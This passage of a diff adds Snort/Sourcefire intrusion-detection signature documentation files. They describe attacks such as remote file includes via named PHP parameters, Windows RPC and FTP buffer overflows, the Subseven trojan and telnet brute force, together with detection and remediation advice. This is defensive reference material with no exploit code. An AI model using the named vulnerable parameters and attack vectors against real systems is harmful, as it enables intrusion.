+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3046.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3046
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1767.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1767
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1215.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1215
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000328.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000328
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_templates.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_templates.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/400.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+400
+
+--
+
+Summary:
+This event is generated when An ICMP Network Unreachable For Type Of Service datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the route to the destination network does not support the Type of Service requested in the datagram or the default TOS.  This could be an indication or routing problems or excessive packet loss.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3105.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3105
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1438.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1438
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3296.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3296
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/103.txt
@@ -0,0 +1,119 @@
+Rule:
+
+--
+Sid:
+103
+
+--
+Summary:
+Subseven22 is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+Subseven is an improved version of the Netbus Trojan (see sids 114, 
+115), Subseven DEFCON8 2.1 is an improved version of Subseven that 
+affects Windows 95 and 98 implementations.
+
+The Trojan changes system startup files and registry settings to add the
+Subseven sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	103	subseven 22 (incoming TCP connection)
+	107	subseven DEFCON8 2.1 access (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in 
+".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ 
+folders that use alphanumeric file names. The name of the replicant may 
+be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running 
+in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/subseven/
+
+McAfee
+http://vil.mcafee.com/dispVirus.asp?virus_k=10566
+http://vil.nai.com/vil/content/v_10566.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/backdoor.subseven22.html
+
+F-Secure:
+http://www.f-secure.com/v-descs/subseven.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/100000546.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000546
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "rss_admin.php" using a remote file being passed 
+as the "DragonRootPath" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "rss_admin.php" script 
+used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1940.txt
@@ -0,0 +1,56 @@
+Rule:
+--
+
+Sid:
+1940
+
+--
+Summary:
+This event is generated when a possible buffer overflow is attempted for the bootpd service.
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Bootp is a protocol used for devices such as diskless workstations to locate a host from which to boot and to receive an assigned an IP address.  A flaw exists in the bootpd service allowing a possible buffer overflow condition when a bootp request is issued with an invalid hardware type. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Affected Systems:
+OpenBSD 2.3, 2.4
+FreeBSD - Releases up to and including 2.x
+
+--
+Attack Scenarios:
+An attacker may attempt to use this exploit to gain remote access on the vulnerable server.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block bootp traffic from entering your network.  
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0798
+
+--
--- /dev/null
+++ b/doc/signatures/871.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+871
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1917.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1917
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker may determine if UPnP is enabled on a host and then attempt
+to exploit a known vulnerability in the service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2538.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2538
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
--- /dev/null
+++ b/doc/signatures/935.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+935
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1381.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1381
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1192.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1192
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1251.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1251
+
+--
+
+Summary:
+This event is generated when an unsuccessful telnet login attempt 
+was detected.
+
+--
+
+Impact:
+Serious. Possible unauthorized access.
+
+--
+
+Detailed Information:
+A user tried to log on to a system via telnet, but has been rejected, 
+either due to invalid username, password, or both. This could mean 
+someone is trying to log on without a proper password (if there are 
+multiple unsuccessful logins) or they may have just mistyped the 
+username or the password.
+
+A large number of these events may indicate an attempt to access the 
+system using a brute force method of guessing usernames and passwords.
+
+--
+
+Affected Systems:
+Machines running telnet servers.
+
+--
+
+Attack Scenarios:
+Attacker brute-forces passwords for a known username via a script or 
+application.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may have mistyped their password.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Check how many invalid attempts occurred, change the password of the 
+user that tried to log in.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/337.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+337
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a buffer overflow vulnerability in the IBM AIX FTP daemon.
+
+--
+Impact:
+Remote execution of arbitrary code leading to remote root compromise.
+
+--
+Detailed Information:
+The IBM AIX 4.3.x FTP daemon contains a buffer overflow vulnerability. An attacker can send an overly long string in the CEL command, causing a buffer overflow condition and allowing the attacker to execute arbitrary code.
+
+--
+Affected Systems:
+IBM AIX 4.3.x
+
+--
+Attack Scenarios:
+An attacker sends a suspiciously large amount of data to the FTP server in the CEL command, causing a buffer overflow condition. The attacker can then execute arbitrary code to obtain root privileges.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the patch provided by IBM. See http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/ERS-SVA-E01-1999.004.1/$file/sva004.txt for an advisory and information about obtaining the patch.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+IBM
+http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/ERS-SVA-E01-1999.004.1/$file/sva004.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2823.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2823
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1991.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1991
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
